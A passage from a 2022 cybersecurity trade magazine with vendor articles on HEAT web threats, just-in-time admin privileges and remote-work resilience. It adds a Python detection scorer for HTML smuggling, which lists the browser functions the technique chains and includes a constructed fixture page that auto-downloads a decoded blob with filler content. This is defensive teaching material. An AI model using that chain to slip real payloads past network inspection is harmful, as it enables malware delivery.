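The HTML Smuggling pattern named under technique 1, together with the caveat just above that each of the browser features involved also has a genuine use, as an added detection example that is not part of the original article or of Menlo Security's products. The indicator weights, the threshold, and both HTML fixtures are assumptions constructed for this example; the "payload" in the second fixture is filler text, not a file.

```python
"""Static scorer for the HTML smuggling chain, illustrating why no single
browser feature can be blocked at the function level: each one is benign on
its own, so only the combination plus an inline payload is treated as HEAT."""
import re

# Browser features that HTML smuggling chains together. A CSV export page
# uses most of them legitimately, so each carries only a small weight.
INDICATORS = {
    "atob(":                1,  # decode an embedded base64 literal client-side
    "new Blob(":            1,  # assemble bytes in memory
    "URL.createObjectURL(": 1,  # mint a blob: URL for them
    "msSaveOrOpenBlob(":    2,  # legacy IE/Edge direct-save API
    ".download =":          1,  # force "save as" instead of navigation
    ".click()":             1,  # trigger the download without user action
}
# A long base64 literal inside an inline script is the smuggled content itself,
# which is what network-level content inspection never sees as a file.
BASE64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{400,}={0,2})['\"]")
SCRIPT = re.compile(r"<script[^>]*>(.*?)</script>", re.S | re.I)


def score_html(html: str) -> dict:
    """Return indicator hits, whether a large inline base64 literal is present,
    and a total score. Only inline <script> bodies are inspected."""
    body = "\n".join(SCRIPT.findall(html))
    hits = [name for name in INDICATORS if name in body]
    big_b64 = BASE64_LITERAL.search(body) is not None
    score = sum(INDICATORS[h] for h in hits) + (3 if big_b64 else 0)
    return {"hits": hits, "inline_payload": big_b64, "score": score}


def verdict(html: str, threshold: int = 6) -> str:
    """'isolate' when the assembly chain and an embedded payload appear
    together; a lone Blob/createObjectURL on an export page stays 'allow'."""
    return "isolate" if score_html(html)["score"] >= threshold else "allow"


# Constructed fixture 1: a legitimate "download as CSV" page. It uses four of
# the six indicators, which is exactly why function-level blocking fails.
BENIGN_EXPORT = """<html><body><button id="x">Download report as CSV</button>
<script>
  var rows = [["id", "total"], ["1", "42"]];
  document.getElementById("x").onclick = function () {
    var csv = rows.map(function (r) { return r.join(","); }).join("\\n");
    var blob = new Blob([csv], {type: "text/csv"});
    var a = document.createElement("a");
    a.href = URL.createObjectURL(blob);
    a.download = "report.csv";
    a.click();
  };
</script></body></html>"""

# Constructed fixture 2: the same chain, but decoding an inline literal and
# auto-triggering with no user action. The literal is filler ("AAA..." repeated).
SUSPECT_SMUGGLING = ("""<html><body><p>Your document is loading...</p>
<script>
  var data = '""" + "QUFB" * 120 + """';
  var bytes = atob(data);
  var blob = new Blob([bytes], {type: "application/octet-stream"});
  var a = document.createElement("a");
  a.href = URL.createObjectURL(blob);
  a.download = "document.bin";
  a.click();
</script></body></html>""")

if __name__ == "__main__":
    for name, page in (("export page", BENIGN_EXPORT), ("suspect page", SUSPECT_SMUGGLING)):
        print(name, score_html(page), "->", verdict(page))
```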
To achieve this, a shift in mindset and an updated security posture is required. Trying to overcome the
challenges of web security with endpoint security creates a square peg in a round hole scenario – it
simply does not guarantee protection.
Critically, endpoint security only detects a threat once it is written to the file system, at which point a
network will likely have been compromised already. Further, it is not able to protect unmanaged devices,
while also harbouring a high chance of inundating the security operations centre (SOC) with too many
alerts.
In dealing with HEAT, prevention is the best policy. Not only can it help to alleviate pressures on
endpoints, but it can also make the already challenging lives of SOC teams much easier, creating a more
sustainable environment of investigation, escalation and resolution.
This shift begins with a thorough review of existing security policies. Those that still remain built around
a central policy pillar of detection and response need to be adapted and enhanced so they are fit for
purpose in the modern work environment.
A Zero Trust approach, backed by the Secure Access Service Edge (SASE) framework, which
features key security technology components, will cater to today’s remote and hybrid workforces. SASE
ensures security is built around users, core applications and company data at the edge by converging
connectivity and security stacks. No longer are security stacks on the outside looking in; they are
integrated within the cloud.
In the face of HEAT, organisations should focus on three key tenets to limit their susceptibility to these
types of attacks: shifting from a detection to a prevention mindset, stopping threats before they hit the
endpoint, and incorporating advanced anti-phishing and isolation capabilities.
For more information on HEAT: Too Hot to Handle.
About the Author
Jonathan Lee, Senior Product Manager, Menlo Security.
Jonathan Lee serves as a trusted advisor to enterprise customers,
and works closely with analysts and industry experts to identify
market needs and requirements, and establish Menlo Security as
a thought leader in the Secure Web Gateway (SWG) and Secure
Access Service Edge (SASE) space. Jonathan previously worked
for ProofPoint and Websense. As an industry expert, commentator
and speaker, Jonathan is well versed in data protection, threat
analysis, networking, Internet isolation technologies, and cloud-delivered
security.
Jonathan can be reached online at @Menlosecurity and at our
company website: https://www.menlosecurity.com/
Lessons Learned: In the Principle Of “Least Privilege,”
Where Do Companies Fall Short?
By Raj Dodhiawala, President, Remediant
Lateral movement using compromised admin credentials is integral to almost all ransomware
and malware attacks today. Specifically exploiting privilege sprawl—or the always-on, always-available
administrative access to servers, workstations, and laptops—has become a lucrative
opportunity for cyber attackers, allowing them to significantly increase their rate of success with
stolen credentials and elevated privileges and, due to implicit trust between systems, the ease
of damaging lateral movement. According to Verizon’s 2021 DBIR report, 74% of cyber-attacks
are caused by privilege misuse or compromise, and for every cybersecurity team,
administrative access sprawl and the high risk of lateral movement pose serious, everyday
threats to their resilience to cyberattacks.
To prevent lateral movement attacks resulting from stolen and misused privilege access,
information security teams are increasingly embracing the Principle of Least Privilege (PoLP),
which NIST defines as “the principle that users and programs should only have the necessary
privileges to complete their tasks.” It states that for any user or program that needs elevated
privileges to complete its task or function, IT teams must enable the least amount of privilege,
no more and no less, to get the job done. This directly emphasizes authorization – meaning that
escalated user privileges must only be allowed to match the computing goals of the task at hand.
While the benefits of PoLP are obvious, there are several challenges that can often get in the
way of achieving them – whether due to the complexity of implementation or the inability to adapt
ingrained processes. For example, unlike Linux’s sudoers subsystem, Windows systems do not
provide granular controls for the tasks an administrative user can or cannot perform. Group
Policies also only go so far, especially since interactions between multiple policies may negate
the effects needed to achieve granular control. It’s actually quite common for an enterprise’s Active Directory
to have Nested Groups, Domain Admins and Backup Admins, and all other privilege groups
containing broad, obfuscated and over-permissioned configurations that either contradict or
cancel out any least privileged controls in place.
One of the biggest issues with PoLP is that time is not explicitly called out as a privilege, and
thus is simply not considered at all when conferring least privileges. Let’s go back to the always-on,
always-available administrative access, but now, the access is constrained to the least
computing privileges required for the task at hand. The fact that all systems have standing
privileges defeats the goal of granular control, because an administrator on one system labeled
trustworthy can, for convenience or with malicious intent, administer all other systems they have
standing privileges on, effectively making the principle of least privilege null and void.
The first step in addressing time is through what Gartner calls Zero Standing Privilege (ZSP), or
the removal of all standing privileges and the implementation of Just-In-Time administration
(JITA). First, ZSP removes the privilege sprawl. Then, JITA, bolstered by multi-factor
authentication (MFA), selectively elevates privileges to the specific system that requires
attention, exactly when the administration is needed, and for just the right amount of time
necessary to complete the task. If cyber thieves (or insiders) were to get a foothold on a system,
the window of opportunity to steal admin credentials would be significantly narrowed, and most
importantly, they wouldn’t find a plethora of administrative access available to exploit and use to
move laterally within the organization.
By combining the Principle of Least Privilege with Zero Standing Privilege and Just-In-Time
administration, companies ensure:
• Measurable reduction of attack surfaces by reducing privilege sprawl, making it less likely,
if not impossible, to hack additional privileged credentials
• The prevention of lateral movement, due to the absence of persistent admin accounts on
other systems; if a privilege credential attack does occur, it is contained to a single system
• Further reduction of risk by using MFA and on-demand, real-time provisioning and
deprovisioning of access as and when required for the task at hand
• Protection from insider threats by reducing the likelihood and impact of employee
negligence or intentional misuse enabled by unnecessary access
• More effective incident response actions by removing admin accounts during an event,
stopping any ongoing incident from installing malware on other systems or proliferating
on the network
• Collectively, these benefits enable governance of privilege and increase maturation
toward Zero Trust
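The time dimension the article adds to least privilege, modelled as an added example that is not part of the original article or of Remediant's product: a standing privilege is a grant with no expiry, while a Just-In-Time grant is scoped to one system, requires MFA, and expires, so the set of systems a stolen credential can reach shrinks to one and then to none. The user and system names, the 60-minute policy ceiling, and the timestamps are constructed assumptions.

```python
"""Minimal model of standing privilege versus Zero Standing Privilege + JITA.
Everything here (users, hosts, policy ceiling, clock) is constructed for the
example; it is not a description of any product's data model."""
from dataclasses import dataclass, field
from datetime import datetime, timedelta
from typing import Optional

DEMO_NOW = datetime(2022, 3, 1, 9, 0)  # constructed clock for the walk-through


@dataclass
class Grant:
    user: str
    system: str
    granted_at: datetime
    expires_at: Optional[datetime]  # None = standing privilege, never expires

    def window_minutes(self) -> Optional[int]:
        """Size of the exposure window; None means unbounded (standing)."""
        if self.expires_at is None:
            return None
        return int((self.expires_at - self.granted_at).total_seconds() // 60)


@dataclass
class PrivilegeStore:
    grants: list = field(default_factory=list)
    max_jit_minutes: int = 60  # hypothetical policy ceiling per elevation

    def add_standing(self, user: str, system: str, now: datetime) -> Grant:
        """The always-on, always-available admin access the article warns about."""
        g = Grant(user, system, now, None)
        self.grants.append(g)
        return g

    def request_jit(self, user: str, system: str, now: datetime,
                    minutes: int, mfa_verified: bool) -> Grant:
        """JITA: elevate on one named system, only after MFA, for a bounded
        window that is capped by policy no matter what was requested."""
        if not mfa_verified:
            raise PermissionError("MFA required before elevation")
        minutes = min(minutes, self.max_jit_minutes)
        g = Grant(user, system, now, now + timedelta(minutes=minutes))
        self.grants.append(g)
        return g

    def _live(self, g: Grant, now: datetime) -> bool:
        return g.expires_at is None or now < g.expires_at

    def has_privilege(self, user: str, system: str, now: datetime) -> bool:
        return any(g.user == user and g.system == system and self._live(g, now)
                   for g in self.grants)

    def reachable_systems(self, user: str, now: datetime) -> list:
        """What a credential stolen right now could administer: the lateral
        movement surface the article describes."""
        return sorted({g.system for g in self.grants
                       if g.user == user and self._live(g, now)})

    def revoke_user(self, user: str) -> int:
        """Incident response: strip every grant for a user during an event."""
        before = len(self.grants)
        self.grants = [g for g in self.grants if g.user != user]
        return before - len(self.grants)


def compare_exposure(now: datetime) -> dict:
    """Same admin, same fleet, two models. Returns the reachable set at the
    moment of elevation and 31 minutes later (after a 30-minute JIT window)."""
    fleet = ["srv01", "srv02", "srv03", "ws-finance-07"]
    standing = PrivilegeStore()
    for host in fleet:
        standing.add_standing("alice", host, now)
    zsp = PrivilegeStore()  # ZSP: nothing standing, one JIT grant on one host
    zsp.request_jit("alice", "srv02", now, minutes=30, mfa_verified=True)
    later = now + timedelta(minutes=31)
    return {
        "standing_now": standing.reachable_systems("alice", now),
        "standing_later": standing.reachable_systems("alice", later),
        "jit_now": zsp.reachable_systems("alice", now),
        "jit_later": zsp.reachable_systems("alice", later),
    }


if __name__ == "__main__":
    for key, hosts in compare_exposure(DEMO_NOW).items():
        print(f"{key:15s} {hosts}")
```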
While the Principle of Least Privilege is an important starting point for organizations, it remains
incomplete or is weakened by ignoring the element of time. The practice of Zero Standing
Privilege and Just-In-Time administration adds the time-based protective layer companies need
at entry points and to prevent the lateral movement that malicious actors use to readily attack and breach
their systems today.
About the Author
Raj Dodhiawala, President, Remediant, Inc. Raj Dodhiawala
has over 30 years of experience in enterprise software and
cybersecurity, primarily focused on bringing disruptive
enterprise products to new markets. Currently serving as
President of Remediant, he is bringing focus, agility and
collaboration across sales, marketing, finance and operations
and leading the company through its next phase of growth.
Raj Dodhiawala can be reached online (LinkedIn) and at our
company website, https://www.remediant.com
Redefining Resilience in The New World of Work
By Andrew Lawton, CEO of Reskube Ltd
We are entering a new world of work. The Covid-19 pandemic has accelerated the move towards hybrid
and remote working which was already gaining momentum before the world went into lockdown. From
one-man-bands to international institutions, workplace and home boundaries have begun to disintegrate.
From Wall Street to Hong Kong to the City of London, traders are now investing millions of dollars and
making complex financial decisions from their homes. Equally, lawyers, journalists, broadcasters, and
workforces across pretty much every sector have had to adjust to forced changes in the way they work,
and are now doing critical work remotely.
Even though pandemic restrictions worldwide are easing, home working – either as part of a fully remote
or hybrid model – is here to stay. But while the likes of monitors, keyboards, stable internet and power
connection, and IT infrastructures were all material mainstays in an office environment, recreating this in
our own homes is less straightforward. This represents a risk to business everywhere.
New risks
The scale of this problem is eye-opening. Research by Reskube has found that 64% of people in the UK
who have worked from home in the last year have suffered from an internet or power outage in that time.
That equates to an estimated 12 million people. Of that, we are finding that 5% of home workers in the
UK are doing time critical or high value work. That equates to roughly 470 million hours a year where any
sort of outage would have a severe impact.
The vast majority of home workers do not currently have a setup that is comparable to their office
environment. This exposes them to potential security risks as they seek other forms of connection to
continue working during an outage. This may include connecting to unstable and unvalidated Wi-Fi
sources.
Consider a critical worker who is working from home. Imagine that their Wi-Fi connection goes down and
they are either unable to perform their job, or forced to rely on an unsecure connection to continue. This
could not only have severe knock-on effects for their productivity, but also represent operational,
financial, and potentially regulatory risks to the business if security is compromised.
For IT teams, managing disparate hybrid workforces is proving enough of a challenge as is. These issues
on top are a further headache they could do without.
What needs to be done?
Working from home is here to stay, meaning that businesses face growing risks to their operations as
power and network outages threaten critical and day-to-day work.
Up until now, ensuring security and resilience for remote workers has tended to be an afterthought, or
something that only comes to attention following an outage or security breach. This need not and should
not be the case.
A home resilience solution is essential for businesses where workers are undertaking time- and mission-
critical work at home, as well as those who rely on a seamless connection for productivity and IT security.
Alongside laptop, phone and broadband, now is the time for businesses to look at implementing new
measures to guarantee connectivity for remote workers. This will enable them to take back control of their
productivity and deliver their best work, uninterrupted.
The good news is there are solutions available on the market today. Adopting such a solution will reduce
the risk of interruptions to the delivery of critical business services or of cybersecurity breaches that could
negatively impact organizations financially, operationally or reputationally. At the same time, it can also
boost productivity and wellbeing across the wider hybrid workforce. I urge businesses and individuals to
explore resilient solutions to minimize the risk to their operations from the new world of remote work.
About the Author
Andrew Lawton is CEO of Reskube Ltd. Andrew has
successfully built and led businesses for 25 years, with senior
positions held at large companies such as HP and IBM, as well
as smaller, fast growing companies including Safetynet,
Guardian and Internet Security Systems (ISS).
Andrew has a passion for leading high-growth technology
businesses in the B2B Services, Software, IT, networking,
telecom, and internet security industries, as well as a strong
track-record for launching new business initiatives and
organisations resulting in aggressive growth.
Andrew Lawton can be reached online here and at the Reskube
company website https://reskube.com/.
CyberDefense.TV now has 200 hotseat interviews and growing…
Market leaders, innovators, CEO hot seat interviews and much more.
A division of Cyber Defense Media Group and sister to Cyber Defense Magazine.
Free Monthly Cyber Defense eMagazine Via Email
Enjoy our monthly electronic editions of our Magazines for FREE.
This magazine is by and for ethical information security professionals with a twist on innovative consumer
products and privacy issues on top of best practices for IT security and Regulatory Compliance. Our
mission is to share cutting edge knowledge, real world stories and independent lab reviews on the best
ideas, products and services in the information technology industry. Our monthly Cyber Defense
e-Magazines will also keep you up to speed on what’s happening in the cyber-crime and cyber warfare
arena plus we’ll inform you as next generation and innovative technology vendors have news worthy of
sharing with you – so enjoy. You get all of this for FREE, always, for our electronic editions. Click here
to sign up today and within moments, you’ll receive your first email from us with an archive of our
newsletters along with this month’s newsletter.
By signing up, you’ll always be in the loop with CDM.
Copyright (C) 2022, Cyber Defense Magazine, a division of CYBER DEFENSE MEDIA GROUP (STEVEN G.
SAMUELS LLC. d/b/a) 276 Fifth Avenue, Suite 704, New York, NY 10001, Toll Free (USA): 1-833-844-9468 d/b/a
CyberDefenseAwards.com, CyberDefenseConferences.com, CyberDefenseMagazine.com,
CyberDefenseNewswire.com, CyberDefenseProfessionals.com, CyberDefenseRadio.com, and
CyberDefenseTV.com, is a Limited Liability Corporation (LLC) originally incorporated in the United States of
America. Our Tax ID (EIN) is: 45-4188465, Cyber Defense Magazine® is a registered trademark of Cyber
Defense Media Group. EIN: 454-18-8465, DUNS# 078358935. All rights reserved worldwide.
marketing@cyberdefensemagazine.com
All rights reserved worldwide. Copyright © 2022, Cyber Defense Magazine. All rights reserved. No part of this
newsletter may be used or reproduced by any means, graphic, electronic, or mechanical, including photocopying,
recording, taping or by any information storage retrieval system without the written permission of the publisher
except in the case of brief quotations embodied in critical articles and reviews. Because of the dynamic nature of
the Internet, any Web addresses or links contained in this newsletter may have changed since publication and may
no longer be valid. The views expressed in this work are solely those of the author and do not necessarily reflect
the views of the publisher, and the publisher hereby disclaims any responsibility for them. Send us great content
and we’ll post it in the magazine for free, subject to editorial approval and layout. Email us at
marketing@cyberdefensemagazine.com
Cyber Defense Magazine
276 Fifth Avenue, Suite 704, New York, NY 1000
EIN: 454-18-8465, DUNS# 078358935.
All rights reserved worldwide.
marketing@cyberdefensemagazine.com
www.cyberdefensemagazine.com
NEW YORK (US HQ), LONDON (UK/EU), HONG KONG (ASIA)
Cyber Defense Magazine - Cyber Defense eMagazine rev. date: 03/01/2022
Books by our Publisher: https://www.amazon.com/Cryptoconomy-Bitcoins-Blockchains-Bad-Guys-ebook/dp/B07KPNS9NH
(with others coming soon...)
10 Years in The Making…
Thank You to our Loyal Subscribers!
We've Completely Rebuilt CyberDefenseMagazine.com - Please Let Us Know What You Think. It's mobile
and tablet friendly and superfast. We hope you like it. In addition, we're past the five nines of 7x24x365
uptime as we continue to scale with improved Web App Firewalls, Content Delivery Networks (CDNs)
around the Globe, Faster and More Secure DNS and CyberDefenseMagazine.com up and running as an
array of live mirror sites and our new B2C consumer magazine CyberSecurityMagazine.com. Millions of
monthly readers and new platforms coming…starting with www.cyberdefenseconferences.com this
month…